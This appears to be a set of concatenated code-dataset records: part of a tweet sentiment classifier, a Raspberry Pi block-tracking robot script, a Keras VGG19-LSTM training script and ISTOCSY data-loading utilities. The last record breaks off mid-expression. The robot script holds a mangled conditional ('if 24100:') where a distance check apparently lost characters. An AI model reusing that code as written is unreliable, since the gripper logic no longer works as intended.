train_tweets:\n try:\n csv_writer.writerow([tweet[\"tweetId\"], tweet[\"text\"], tweet[\"topic\"], tweet[\"label\"]])\n except Exception as e:\n print(e)\n\n\ndef build_training_set():\n tweets_ids = []\n\n with open('corpus.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',', quotechar=\"\\\"\")\n for row in csv_reader:\n tweets_ids.append({'tweetId': row[2], 'label': row[1], 'topic': row[0]})\n\n train_tweets = fetch_tweets_by_id(tweets_ids)\n write_csv_output(train_tweets)\n\n return train_tweets\n\n\ndef get_training_set():\n tweets_list = []\n with open('training_set.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',', quotechar=\"\\\"\")\n for row in csv_reader:\n tweets_list.append({'tweetId': row[0], 'label': row[3], 'topic': row[2], 'text': row[1]})\n if len(tweets_list) == 0:\n return build_training_set()\n return tweets_list\n\n\ndef build_vocabulary(pre_processed_train_set):\n all_words = []\n\n for (words, sentiment) in pre_processed_train_set:\n all_words.extend(words)\n\n wordlist = nltk.FreqDist(all_words)\n word_features = wordlist.keys()\n\n return word_features\n\n\ndef extract_features(tweet):\n tweet_words = set(tweet)\n features = {}\n for word in word_features:\n features['contains(%s)' % word] = (word in tweet_words)\n return features\n\n\n#main\npre_process = pp.PreProcessTweets()\n\ntwitter_api = twitter_connection()\ntest_set = build_test_set(twitter_api, \"racism\")\ntrain_set = get_training_set()\n\npre_processed_test_set = pre_process.process_tweets(test_set)\npre_processed_train_set = pre_process.process_tweets(train_set)\nword_features = build_vocabulary(pre_processed_train_set)\ntraining_features = nltk.classify.apply_features(extract_features, pre_processed_train_set)\nNBayesClassifier = nltk.NaiveBayesClassifier.train(training_features)\nNBResultLabels = [NBayesClassifier.classify(extract_features(tweet[0])) for tweet in pre_processed_test_set]\n\nif NBResultLabels.count('positive') > NBResultLabels.count('negative'):\n print(\"Overall Positive Sentiment\")\n print(\"Positive Sentiment Percentage = \" + str(100*NBResultLabels.count('positive')/len(NBResultLabels)) + \"%\")\nelse:\n print(\"Overall Negative Sentiment\")\n print(\"Negative Sentiment Percentage = \" + str(100*NBResultLabels.count('negative')/len(NBResultLabels)) + \"%\")\n\n\n\n\n\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259554619","text":"import RPi.GPIO as gpio\r\nimport time\r\nimport numpy as np \r\nfrom matplotlib import pyplot as plt\r\nimport math\r\nimport os\r\nfrom picamera import PiCamera\r\nfrom time import sleep\r\nfrom picamera.array import PiRGBArray\r\nimport cv2\r\nimport imutils\r\nimport picamera\r\nfrom time import sleep\r\nfrom PIL import Image\r\n\r\ntrig = 16\r\necho = 18\r\nsum=0\r\naverage=0\r\ncamera_stat = False\r\n\r\n\r\ndef distance():\r\n\t#init()\r\n\t#gpio.cleanup()\r\n\t#gpio.setwarnings(False)\r\n\tavg_dist = []\r\n\tprint(\"Getting the distance\")\r\n\tfor i in range(10):\r\n\t\tgpio.setmode(gpio.BOARD)\r\n\t\tgpio.setup(trig, gpio.OUT)\r\n\t\tgpio.setup(echo, gpio.IN)\r\n\r\n\t\tgpio.output(trig, False)\r\n\t\ttime.sleep(0.01)\r\n\t\t\r\n\t\t#generate trigger pulse\r\n\t\tgpio.output(trig, True)\r\n\t\ttime.sleep(0.00001)\r\n\t\tgpio.output(trig,False)\r\n\t\tprint(\"Reading the Distance\",gpio.input(echo))\r\n\t\twhile gpio.input(echo) == 0:\r\n\t\t\tpulse_start = time.time()\r\n\t\t\t#print(\"Pulse start is \",pulse_start)\r\n\r\n\t\twhile gpio.input(echo) == 1:\r\n\t\t\tpulse_end = time.time()\r\n\t\tprint(\"Out of loop \")\r\n\t\tpulse_duration = pulse_end - pulse_start\r\n\r\n\t\t# convert time to distacne \r\n\t\tdistance = pulse_duration*17150\r\n\t\tdistance = round(distance, 2)\r\n\t\tavg_dist.append(distance)\r\n\r\n\t#cleanup gpio pims and return the disatmce \t\r\n\tavg_dist = np.mean(avg_dist)\r\n\tprint(\"got the distance\",distance)\r\n\tgpio.cleanup()\r\n\treturn avg_dist\r\n\r\ndef init():\r\n\tgpio.setmode(gpio.BOARD)\r\n\tgpio.setup(31,gpio.OUT)\r\n\tgpio.setup(33,gpio.OUT)\r\n\tgpio.setup(35,gpio.OUT)\r\n\tgpio.setup(37,gpio.OUT)\r\n\r\n\tgpio.setup(12,gpio.IN,pull_up_down = gpio.PUD_UP)\r\n\tgpio.setup(7,gpio.IN,pull_up_down = gpio.PUD_UP)\r\n\r\n\r\ndef gameover():\r\n\tgpio.output(31,False)\r\n\tgpio.output(33,False)\r\n\tgpio.output(35,False)\r\n\tgpio.output(37,False)\r\n\tgpio.cleanup()\r\n\r\ndef revs_ticks(final_dist):\r\n\r\n\trevs = (120/(2*math.pi* 0.0325)) * final_dist\r\n\t## for Ticks\r\n\tticks = (960/(2*math.pi* 0.0325)) * final_dist\r\n\treturn revs, ticks\r\n\r\n\r\ndef turn(deg):\r\n\tcircu = 2*math.pi*0.1007\r\n\tarc_lenght = (deg/360)*circu\r\n\t## revs calculation\r\n\trevs = (120/(2*math.pi* 0.0325)) * arc_lenght\r\n\t## Ticks Calculation\r\n\tticks = (960/(2*math.pi* 0.0325)) * arc_lenght\r\n\treturn revs, ticks\r\n\r\ndef execute(distance,pwm1,pwm2,val,final_ticks,event):\r\n\tcounterBR = np.uint64(0)\r\n\tcounterFL = np.uint64(0)\r\n\r\n\tbuttonBR = int(0)\r\n\tbuttonFL = int(0) \r\n\tdist = 0\r\n\tfinal_dist = distance\r\n\tif event == \"a\":\r\n\t\t# Final Values to the PWM for forward\r\n\t\tpwm1.start(val-4)\r\n\t\tpwm2.start(val+1)\t\r\n\telif event == 's':\r\n\t\tpwm1.start(val-1)\r\n\t\t#pwm2.start(val+62)\r\n\t\tpwm2.start(val+62)\r\n\t\r\n\telse:\r\n\t\tpwm1.start(val)\r\n\t\tpwm2.start(val)\r\n\ttime.sleep(0.1)\r\n\tfor i in range(0,1000000000):\r\n\t\t#print()\r\n\t\tif int(gpio.input(12)) != int(buttonBR):\r\n\t\t\tbuttonBR = int(gpio.input(12))\r\n\t\t\tcounterBR += 1\r\n\r\n\t\tif int(gpio.input(7)) != int(buttonFL):\r\n\t\t\tbuttonFL = int(gpio.input(7))\r\n\t\t\tcounterFL += 1\r\n\r\n\t\tif counterFL < counterBR and event != 's':\r\n\t\t\t#print(\"duty cycle change\",counterFL,counterBR)\r\n\t\t\tpwm2.ChangeDutyCycle(val+5)\r\n\t\t\t\r\n\t\tif counterFL > counterBR and event != 's':\r\n\t\t\t#print(\"changing duty cycle\",counterFL,counterBR)\r\n\t\t\tpwm1.ChangeDutyCycle(val+5)\r\n\r\n\t\tif counterFL < counterBR and event == 's':\r\n\t\t\t#print(\"for reverse front left\",counterFL,counterBR)\r\n\t\t\tpwm2.ChangeDutyCycle(val+7)\r\n\t\t\t\r\n\t\tif counterFL > counterBR and event == 's':\r\n\t\t\t#print(\"for reverse\",counterFL,counterBR)\r\n\t\t\tpwm1.ChangeDutyCycle(val+5)\r\n\t\t\r\n\t\t#print(final_ticks)\r\n\t\tif counterBR >= final_ticks and counterFL >= final_ticks and (event == 'w' or event == 's') :\r\n\t\t\tprint(\"Travelled\",final_dist,\"meters\")\r\n\t\t\tbreak\r\n\t\telif (counterFL >= final_ticks and counterBR >= final_ticks) and event =='a':\r\n\t\t\tprint('Travelled for ',final_dist,\"angle\")\r\n\t\t\tbreak\r\n\t\telif counterFL >= final_ticks and counterBR >= final_ticks *1.4 and event == 'd':\r\n\t\t\tprint('Travelled in ',final_dist,\"angle\")\r\n\t\t\tbreak\r\n\tgpio.cleanup()\r\n\t\r\ndef forward(inp):\r\n\tinit()\r\n\tpwm1 = gpio.PWM(31,50)\r\n\tpwm2= gpio.PWM(37,50)\r\n\tval = 30\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = revs_ticks(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'w')\r\n\t#print(\"Moved Forward\")\r\n\r\n\r\ndef reverse(inp):\r\n\tpwm1 = gpio.PWM(33,50)\r\n\tpwm2= gpio.PWM(35,50)\r\n\tval = 30\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = revs_ticks(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'s')\r\n\t#print(\"Moved Backward\")\r\n\r\n\r\ndef right(inp):\r\n\tpwm1 = gpio.PWM(31,50)\r\n\tpwm2= gpio.PWM(35,50)\r\n\tval = 80\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = turn(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'d')\r\n\t#print(\"Pivoted Right\")\r\n\r\n\r\ndef left(inp):\r\n\tpwm1 = gpio.PWM(33,50)\r\n\tpwm2= gpio.PWM(37,50)\r\n\tval = 70\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = turn(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'a')\r\n\t#print(\"Pivoted Left\")\r\n\r\ndef pos(l,theta):\r\n\tnew_x= l*(math.cos(theta*(3.14/180)))\r\n\tnew_y= l*(math.sin(theta*(3.14/180)))\r\n\treturn new_x,new_y,theta\r\n\r\ndef closeg():\r\n\t\r\n\tgpio.setmode(gpio.BOARD)\r\n\tgpio.setup(36, gpio.OUT)\r\n\tpwm = gpio.PWM(36, 50)\r\n\tpwm.start(5)\r\n\tpwm.ChangeDutyCycle(3.5)\r\n\ttime.sleep(2)\r\n\r\ndef openg():\r\n\tgpio.setmode(gpio.BOARD)\r\n\tgpio.setup(36, gpio.OUT)\r\n\tpwm = gpio.PWM(36, 50)\r\n\tpwm.start(5)\r\n\tpwm.ChangeDutyCycle(9.5)\r\n\ttime.sleep(2)\t\r\n\r\ndef em():\r\n\tcmd = 'python3 email01.py'\r\n\tos.system(cmd)\r\n\r\ndef main():\r\n\tinit()\r\n\tcamera = PiCamera()\r\n\tcamera.rotation = 180\r\n\trawCapture = PiRGBArray(camera, size=(640,480))\r\n\tcamera.resolution = (640,480)\r\n\tcamera.start_preview() \r\n\ttime.sleep(2)\r\n\tcamera.capture('hsvcalib.jpg')\r\n\tcamera.stop_preview()\r\n\timage =cv2.imread(\"hsvcalib.jpg\")\r\n\tlower_red= np.array ([0,150,82])\r\n\r\n\tupper_red = np.array([5,231,222])\r\n\r\n\thsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\r\n\tmask= cv2.inRange(hsv,lower_red,upper_red)\r\n\tresult=cv2.bitwise_and(hsv, hsv, mask=mask)\r\n\tblur = cv2.GaussianBlur(mask,(9,9),0)\r\n\t#cv2.imwrite('hsv.jpg',hsv)\r\n\t#cv2.imwrite('result.jpg',result)\r\n\tcv2.drawMarker(image,(320,240),1 )\r\n\tret,thresh = cv2.threshold(blur,127,255,0)\r\n\tim2, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\tcv2.drawContours(image, contours, -1, (0,0,255), 3)\r\n\t# Find the index of the largest contour\r\n\tareas = [cv2.contourArea(c) for c in contours]\r\n\tif areas !=[]:\r\n\t\tprint(areas)\r\n\t\tmax_index = np.argmax(areas)\r\n\t\tcamera_stat = True\r\n\t\tcnt=contours[max_index]\r\n\t\t(x,y),radius = cv2.minEnclosingCircle(cnt)\r\n\t\tcenter = (int(x),int(y))\r\n\t\tradius=int(radius)\r\n\t\tcv2.circle(image,center,radius,(0,255,0),2)\r\n\t\tcv2.circle(image,center,1,(0,255,255),2)\r\n#cv2.imshow('o',image)\r\n\t#cv2.waitKey(0)\r\n\t\tdegblock=0\r\n\t\ttime.sleep\r\n\t\tif x>340:\r\n\t\t\tdegblock= (x-640/2)*0.061\r\n\t\t\tright(degblock)\r\n\t\tif x<290:\r\n\t\t\tdegblock=abs((x-(640/2))*0.061)\r\n\t\t\tleft(degblock)\r\n\t\ttime.sleep(2)\r\n\t\tcamera.close()\r\n\t\tprint(\"The value of x is\",x)\r\n\t\tgpio.cleanup()\r\n\t\tif x>280 and x<350:\r\n\t\t\tprint(\"In the loop\")\r\n\t\t\tdist=distance()\r\n\t\t\t\r\n\t\t\tif 24100:\r\n\t\t\t\tcloseg()\r\n\telse:\r\n\t\tcamera_stat = False\r\n\tprint(\"The camera stat\")\r\n\treturn camera_stat\r\n\t\t# gpio.cleanup()\r\n\r\nfor i in range(0,1000):\r\n\tstat = main()\r\n\tif stat != True:\r\n\t\tprint(\"Exitting\")\r\n\t\tbreak\r\n\tprint(i)\r\n\r\ngameover()\r\n\r\n\r\n\t\r\n\r\n\r\n\r\n\t\r\n\r\n\r\n\r\n\t","sub_path":"hw9/trackblock.py","file_name":"trackblock.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61099129","text":"from keras.applications.vgg19 import VGG19\nfrom keras.layers import LSTM\nfrom keras import Sequential\nfrom keras.layers import Dense, Flatten, Dropout\nfrom keras.layers import TimeDistributed\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport load_dataset as load\nimport os\nimport util\nnp.set_printoptions(threshold=np.inf)\nprint(os.getcwd())\n\n# set hyperparameters\nseq_length = 60\nbatch_size = 2\nepoch = 50\nclass_num = 2\nlr = 0.0001\ndecay = 0.0001\nadam = Adam(lr=lr, decay=decay)\n\n\n# Load dataset\ntrain_data_path = \"/dataset/train_data.npy\"\ntrain_label_path = \"/dataset/train_labels_VA.npy\"\nval_data_path = \"/dataset/val_data.npy\"\nval_label_path = \"/dataset/val_labels_VA.npy\"\n\nx_train = load.load_dataset(train_data_path)\ny_train = load.load_dataset(train_label_path)\nx_val = load.load_dataset(val_data_path)\ny_val = load.load_dataset(val_label_path)\n\n\n#setup vgg cnn\nvgg = VGG19(include_top=False, weights='imagenet', input_shape=(72,72,3))\ncnn = Sequential()\ncnn.add(vgg)\ncnn.add(Dropout(0.5))\ncnn.add(Flatten())\n\n#add LSTM to model\nmodel = Sequential()\nmodel.add(TimeDistributed(cnn, input_shape=(seq_length, 72, 72, 3), trainable=False))\nmodel.add(LSTM(128, input_shape=(batch_size, seq_length, 1), return_sequences=True))\nmodel.add(TimeDistributed(Dropout(0.5)))\n\n\n# add FC\nmodel.add(TimeDistributed(Dense(128)))\nmodel.add(TimeDistributed(Dropout(0.5)))\nmodel.add(TimeDistributed(Dense(class_num, activation='linear')))\n\n\n# train\nprint(model.summary())\nmodel.compile(optimizer=adam, loss='mse', metrics=[util.ccc, 'mse'])\n\n\n# save the model\nif not os.path.exists(\"./model\"):\n\tos.makedirs(\"./model\")\n\nfilepath = \"./model/model.h5\"\ncheckpoint = ModelCheckpoint(filepath, save_best_only=True)\ncallbacks_list = [checkpoint]\n\n\nhist = model.fit(x=x_train, y=y_train, validation_data=(x_val, y_val), epochs=epoch, batch_size=batch_size, callbacks=callbacks_list)\n\nprint(hist.history)\n","sub_path":"training/VA_models/VA_model4.py","file_name":"VA_model4.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574422520","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nUtility functions for runISTOCSY.py\n\nCreated on Fri Apr 6 11:32:54 2018\n\n@author: cs401\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas\nfrom scipy.stats import pearsonr, spearmanr, kendalltau\nimport networkx as nx\nimport warnings\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import QSizeF\nfrom PyQt5.QtPrintSupport import QPrinter\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import (LinearRegression, RANSACRegressor)\n\n\ndef _loadDataset(self, intensityDataFile=None, featureMetadataFile=None, sampleMetadataFile=None, datasetName='Data', datasetType='Targeted'):\n\t\"\"\" Load data from intensityData, featureMetadata and sampleMetadata csv files \"\"\"\n\n\t# Check input\n\tif ((intensityDataFile is None) or (featureMetadataFile is None) or (sampleMetadataFile is None)):\n\t\traise TypeError('Either intensityDataFile, featureMetadataFile and sampleMetadataFile files must be set')\n\n\t# Import data and do some basic checks\n\t(intensityData, featureMetadata, sampleMetadata) = _importAndCheckData(intensityDataFile, featureMetadataFile, sampleMetadataFile, datasetName, datasetType)\n\n\t# Update details for number of samples and features in loaded dataset\n\tself.Attributes['datasetsDetails'][-1].append(intensityData.shape[0])\n\tself.Attributes['datasetsDetails'][-1].append(intensityData.shape[1])\n\n\t# If this is the first dataset loaded\n\tif not hasattr(self, 'dataset'):\n\n\t\t# Create dataset\n\t\tclass Dataset(object):\n\n\t\t\tdef __init__(self):\n\t\t\t\tself.intensityData = np.array(None)\n\t\t\t\tself.featureMetadata = pandas.DataFrame(None, columns=['Dataset Name', 'Data Type', 'Feature Name', 'Feature Name Original', 'Retention Time', 'm/z', 'ppm', 'Targeted Feature Number', 'Median Intensity Scaled'])\n\t\t\t\tself.sampleMetadata = pandas.DataFrame(None, columns=['Sample ID', 'Sample File Name'])\n\n\t\tself.dataset = Dataset()\n\n\t\t# Load into dataset object\n\t\tself.dataset.intensityData = intensityData\n\t\tself.dataset.featureMetadata = self.dataset.featureMetadata.append(featureMetadata, ignore_index=True, sort=False)\n\t\tself.dataset.sampleMetadata = self.dataset.sampleMetadata.append(sampleMetadata, ignore_index=True, sort=False)\n\n\t# Else, match new data into existing (on Sample ID)\n\telse:\n\n\t\t# Match datasets\n\t\tself = _matchDatasets(self, intensityData, featureMetadata, sampleMetadata)\n\n\t# Enforce types\n\ttry:\n\t\tself.dataset.featureMetadata['ppm'] = self.dataset.featureMetadata['ppm'].astype(np.float64)\n\t\tself.dataset.featureMetadata['Retention Time'] = self.dataset.featureMetadata['Retention Time'].astype(np.float64)\n\t\tself.dataset.featureMetadata['m/z'] = self.dataset.featureMetadata['m/z'].astype(np.float64)\n\t\tself.dataset.featureMetadata['Targeted Feature Number'] = self.dataset.featureMetadata['Targeted Feature Number'].astype(np.float64)\n\texcept:\n\t\t_displayMessage('ALERT: please check for non-numerical values in appropriate featureMetadata.csv file columns')\n\n\n\t# Update details for number of samples and features in full ISTOCSY dataset\n\tself.Attributes['istocsyDatasetDetails'][0], self.Attributes['istocsyDatasetDetails'][1] = self.dataset.intensityData.shape\n\n\n\ndef _importAndCheckData(intensityDataFile, featureMetadataFile, sampleMetadataFile, datasetName, datasetType, relativeIntensityMetric='max'):\n\t\"\"\" Helper function to import new dataset \"\"\"\n\t\t\n\t# Import data\n\tintensityData = np.genfromtxt(intensityDataFile, delimiter=',')\n\tfeatureMetadata = pandas.read_csv(featureMetadataFile, index_col=False)#index_col=0)\n\tsampleMetadata = pandas.read_csv(sampleMetadataFile, index_col=False)#index_col=0)\n\n\t# Check attributes (new data)\n\tds, dv = intensityData.shape\n\tfv = featureMetadata.shape[0]\n\tss = sampleMetadata.shape[0]\n\n\tif dv != fv:\n\t\traise ValueError('intensityData and featureMetadata have different dimensions')\n\tif ds != ss:\n\t\traise ValueError('intensityData and sampleMetadata have different dimensions')\n\n\t# Check 'Sample ID' and 'Feature Name' present\n\ttry:\n\t\tfeatureMetadata['Feature Name'] = featureMetadata['Feature Name'].astype(str)\n\t\tsampleMetadata['Sample ID'] = sampleMetadata['Sample ID'].astype(str)\n\texcept:\n\t\traise ValueError('\"Feature Name\" and \"Sample ID\" columns must be present')\n\n\tfeatureMetadata['Dataset Name'] = datasetName\n\tfeatureMetadata['Data Type'] = datasetType\n\tif datasetType == 'Targeted':\n\t\tfeatureMetadata['Targeted Feature Number'] = np.arange(dv)\n\n\t# Check for and exclude samples with duplicate 'Sample ID's\n\tu_ids, u_counts = np.unique(sampleMetadata['Sample ID'], return_counts=True)\n\tif any(u_counts > 1):\n\n\t\t# Warn\n\t\twarnings.warn('Check and remove duplicates in sampleMetadata file, by default these will be excluded')\n\n\t\t# By default delete duplicates\n\t\tsampleList = u_ids[u_counts > 1]\n\n\t\tsampleMask = np.squeeze(np.ones([sampleMetadata.shape[0], 1], dtype=bool), axis=1)\n\n\t\tfor sample in sampleList:\n\t\t\tsampleMask[sampleMetadata[sampleMetadata['Sample ID'] == sample].index] = False\n\n\t\tsampleMetadata = sampleMetadata.loc[sampleMask]\n\t\tsampleMetadata.reset_index(drop=True, inplace=True)\n\t\tintensityData = intensityData[sampleMask, :]\n\n\t# NOTE: nan values must not be present (for correlation calculation) - replace with zeros\n\tif (np.isnan(intensityData).any()):\n\n\t\t# Warn\n\t\twarnings.warn('Missing (nan) values found in intensity data file, by default these will be replaced with zeros')\n\n\t\t# By default replace with zeros\n\t\tintensityData[np.isnan(intensityData)] = 0\n\n\t# Calculate 'Relative Intensity' for NMR and Targeted feature plotting\n\tif relativeIntensityMetric == 'max':\n\t\tfeatureMetadata['Relative Intensity'] = np.nanmax(intensityData, axis=0)\n\n\telif relativeIntensityMetric == 'median':\n\t\tfeatureMetadata['Relative Intensity'] = np.nanmedian(intensityData, axis=0)\n\t\t\n\telse:\n\t\tfeatureMetadata['Relative Intensity'] = np.nanmean(intensityData, axis=0)\n\n\t# Scale so max value is 1 (if multiple datasets present on different scales)\n\tfeatureMetadata['Relative Intensity'] = np.divide(featureMetadata['Relative Intensity'], np.nanmax(featureMetadata['Relative Intensity']))\n\n # Append dataset name to 'Feature Name' for plotting\n\tfeatureMetadata['Feature Name Original'] = featureMetadata['Feature Name']\n\tfeatureMetadata['Feature Name'] = datasetName + '_' + featureMetadata['Feature Name Original']\n\t\n\t# Append dataset name to 'Sample File Name'\n\tsampleMetadata['Sample File Name'] = datasetName + '_' + sampleMetadata['Sample File Name']\n\n\treturn intensityData\t, featureMetadata, sampleMetadata\n\n\ndef _matchDatasets(self, intensityData, featureMetadata, sampleMetadata):\n\t\"\"\" Helper function to match new dataset to existing \"\"\"\n\t\n\t# NOTE: keep ONLY samples that are in all datasets, otherwise correlation structure inaccurate!\n\n\t# Set up new intensityData to be filled\n\tns1, nv1 = self.dataset.intensityData.shape\n\tns2, nv2 = intensityData.shape\n\tintensityDataNew = np.zeros([ns1+ns2, nv1+nv2])\n\tsampleDataIndexIX1 = []\n\tsampleDataIndexIX2 = []\n\tintensityDataIndex = 0\n\n\t# Determine 'Targeted Feature Number' for starting index\n\ttfn_ix = np.max(self.dataset.featureMetadata['Targeted Feature Number']) + 1\n\tif np.isnan(tfn_ix):\n\t\ttfn_ix=0\n\n\t# Update 'Targeted Feature Number' if new dataset is this type\n\tif featureMetadata['Data Type'][0] == 'Targeted':\n\t\tfeatureMetadata['Targeted Feature Number'] = featureMetadata['Targeted Feature Number'] + tfn_ix\n\n\t# Create merged list of all sample IDs\n\tsampleIDs_all = np.unique(self.dataset.sampleMetadata['Sample ID'].append(sampleMetadata['Sample ID']))\n\n\tfor sampleID in sampleIDs_all:\n\t\tix1 = self.dataset.sampleMetadata[sampleID == self.dataset.sampleMetadata['Sample ID']].index\n\t\tix2 = sampleMetadata[sampleID == sampleMetadata['Sample ID']].index\n\n\t\t# If sampleID present in both datasets - match sampleMetadata to existing\n\t\tif (not ix1.empty) & (not ix2.empty):\n\t\t\tintensityDataNew[intensityDataIndex, 0:nv1] = self.dataset.intensityData[ix1, :]\n\t\t\tintensityDataNew[intensityDataIndex, nv1:nv1+nv2] = intensityData[ix2, :]\n\t\t\tsampleDataIndexIX1.append(ix1[0])\n\t\t\tsampleDataIndexIX2.append(ix2[0])\n\t\t\tintensityDataIndex = intensityDataIndex + 1\n\n\t# Sort new sampleMetadata\n\tself.dataset.sampleMetadata = self.dataset.sampleMetadata.loc[sampleDataIndexIX1,:]\n\tself.dataset.sampleMetadata.reset_index(drop=True, inplace=True)\n\tsampleMetadata = sampleMetadata.loc[sampleDataIndexIX2,:]\n\tsampleMetadata.reset_index(drop=True, inplace=True)\n\tself.dataset.sampleMetadata['Sample File Name'] = self.dataset.sampleMetadata['Sample File Name'] + ';' + sampleMetadata['Sample File Name']\n\n\t# Append new featureMetadata\n\tself.dataset.featureMetadata = self.dataset.featureMetadata.append(featureMetadata, sort=False)\n\tself.dataset.featureMetadata.reset_index(drop=True, inplace=True)\n\n\t# Overwrite intensityData\n\tself.dataset.intensityData = intensityDataNew[0:intensityDataIndex,:]#nsIX,:]\n\n\t# TODO sort NMR so ppm ascending?\n\n\treturn (self)\n\n\ndef _deleteDataset(self, datasetToDelete):\n\t\"\"\" Delete existing dataset \"\"\"\n\t\n\t# Find features corresponding to dataset\n\tfeatureMask = self.dataset.featureMetadata['Dataset Name'] == datasetToDelete\n\t\n\t# Find samples corresponding to dataset (matches datasetToDelete name in 'Sample File Name' column)\n\tallSamples = self.dataset.sampleMetadata['Sample File Name'].str.split(\";\", expand=True)\n\tsampleMask = []\n\t\n\tfor col in allSamples.columns:\n\t\tif allSamples.loc[0, col].startswith(datasetToDelete):\n\t\t\tsampleMask.append(col)\n\n\tallSamples.drop(columns=sampleMask, inplace=True)\t\n\t\n\t# If no samples or feature remain, reset dataset\n\tif (sum(featureMask)==len(featureMask) and allSamples.shape[1]==0):\n\t\t\n\t\t# Delete dataset\n\t\tdel(self.dataset)\n\t\t\n\t\t# Reset Attributes['istocsyDatasetDetails']\n\t\tself.Attributes['istocsyDatasetDetails'] = [None] * 2\n\t\t\n\telse:\n\t\t\n\t\t# Remove features from intensityData\n\t\tself.dataset.intensityData = self.dataset.intensityData[:,~featureMask.values]\t\t\n\t\t\t\n\t\t# Remove features from featureMetadata\n\t\tself.dataset.featureMetadata = self.dataset.featureMetadata.loc[~featureMask.values]\n\t\tself.dataset.featureMetadata.reset_index(drop=True, inplace=True)\n\t\n\t\t# Remove sample names from sampleMetadata\n\t\tself.dataset.sampleMetadata['Sample File Name'] = allSamples[allSamples.columns].apply(lambda row: '; '.join(row.values.astype(str)), axis=1)\n\n\t\t# Update numbers in Attributes['istocsyDatasetDetails']\n\t\tself.Attributes['istocsyDatasetDetails'][0], self.Attributes['istocsyDatasetDetails'][1] = self.dataset.intensityData.shape\t\n\t\t\t\t\n\t# Update Attributes['datasetsDetails']\n\tself.Attributes['datasetsDetails'] = [i for i in self.Attributes['datasetsDetails'] if i[0] != datasetToDelete]\n\n\ndef _loadAnnotations(self):\n\t\"\"\" Load annotations csv file \"\"\"\n\n\t# Check input\n\tif (self.Attributes['annotationFilePath'] is None):\n\t\traise TypeError('Annotation file path must be set')\n\n\t# Import annotation file\n\tannotationData = pandas.read_csv(self.Attributes['annotationFilePath'], index_col=False)\n\n\t# Either create or append to existing data\n\tif not hasattr(self, 'annotationData'):\n\n\t\tself.annotationData = pandas.DataFrame(None, columns=['Annotation', 'Retention Time', 'm/z', 'ppm'])\n\n\tself.annotationData = self.annotationData.append(annotationData, sort=False)\n\n\tself.annotationData.reset_index(drop=True, inplace=True)\n\n\t# Ensure columns set to right data type\n\ttry:\n\t\tself.annotationData['Annotation'] = self.annotationData['Annotation'].astype(str)\n\t\tself.annotationData['ppm'] = self.annotationData['ppm'].astype(np.float64)\n\t\tself.annotationData['Retention Time'] = self.annotationData['Retention Time'].astype(np.float64)\n\t\tself.annotationData['m/z'] = self.annotationData['m/z'].astype(np.float64)\n\n\texcept:\n\n\t\traise ValueError('ALERT: please check fields in ' + self.Attributes['annotationDataFile'])\n\t\t_displayMessage('ALERT: please check fields in ' + self.Attributes['annotationDataFile'])\n\n\ndef _matchAnnotations(self):\n\t\"\"\" Match annotations csv file to data \"\"\"\n\n\t# TODO do not match to targeted data? Although OK for now, validation stages!\n\n\t# Do not run match to annotation file again if already matched\n\tmask = self.dataset.featureMetadata['Feature Name'].str.contains(\"_annotationMatch_\")\n\n\tfor i in range(self.annotationData.shape[0]):\n\n\t\t# LC-MS annotation\n\t\tif np.isfinite(self.annotationData.loc[i, 'Retention Time']):\n\n\t\t\ttemp = (self.dataset.featureMetadata.loc[~mask, 'Retention Time'] >= self.annotationData.loc[i, 'Retention Time'] - self.Attributes['rtThreshold']) & (self.dataset.featureMetadata.loc[~mask, 'Retention Time'] <= self.annotationData.loc[i, 'Retention Time'] + self.Attributes['rtThreshold']) & (np.multiply(np.divide(np.abs(self.dataset.featureMetadata.loc[~mask, 'm/z'] - self.annotationData.loc[i, 'm/z']), self.annotationData.loc[i, 'm/z']), 1000000) <= self.Attributes['mzThreshold'])\n\n\t\t# NMR annotation\n\t\telse:\n\n\t\t\ttemp = (self.dataset.featureMetadata.loc[~mask, 'ppm'] >= self.annotationData.loc[i, 'ppm'] - self.Attributes['ppmThreshold']) & (self.dataset.featureMetadata.loc[~mask, 'ppm'] <= self.annotationData.loc[i, 'ppm'] + self.Attributes['ppmThreshold'])\n\n\t\t# Append feature name with annotataion match\n\t\tif (sum(temp)>=1):\n\t\t\ttemp = temp.index[temp==True]\n\t\t\tself.dataset.featureMetadata.loc[temp, 'Feature Name'] = self.dataset.featureMetadata.loc[temp, 'Feature Name'] + '_annotationMatch_' + self.annotationData.loc[i, 'Annotation']\n\n\ndef _findNearest(featureMetadata, Xon, Yon, Xvalue, Yvalue):\n\t\"\"\" Find the nearest point under the click\n\n\t:param pandas.dataFrame featureMetadata: feature metadata, must contain 'Retention Time' and 'm/z' columns\n\t:param float Xvalue: x axis value of point\n\t:param float Yvalue: y axis value of point\n\t\"\"\"\n\n\txtol = np.sort(featureMetadata[Xon])\n\txtol = np.median(np.sort(xtol))\n\tytol = np.sort(featureMetadata[Yon])\n\tytol = np.median(np.sort(ytol))\n\tx = 0\n\ty = 0\n\n\ttemp = (featureMetadata[Xon] >= Xvalue - x) & (featureMetadata[Xon] <= Xvalue + x) & 